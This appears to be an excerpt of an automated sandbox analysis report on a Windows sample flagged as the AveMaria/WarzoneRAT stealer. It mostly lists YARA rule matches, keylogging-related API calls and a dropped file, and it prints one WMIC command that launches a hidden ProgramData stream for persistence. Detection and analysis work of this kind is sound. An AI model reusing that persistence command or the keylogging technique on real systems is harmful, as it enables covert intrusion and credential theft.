          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

          E-Banking Fraud

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Contains functionality to create processes via WMI
          Source: WMIC.exe, 0000000D.00000002.288337503.000001B74FE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00415808
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00412922
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00412480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00416D23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004156DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040B784
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D21BF8
          Source: C:\ProgramData\images.exeCode function: 4_3_02F542D0
          Source: C:\ProgramData\images.exeCode function: 4_3_02F91AA0
          Source: C:\ProgramData\images.exeCode function: 4_3_02F86B50
          Source: C:\ProgramData\images.exeCode function: 4_3_02F45AB0
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmi.dll
          Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
          Source: Joe Sandbox ViewDropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
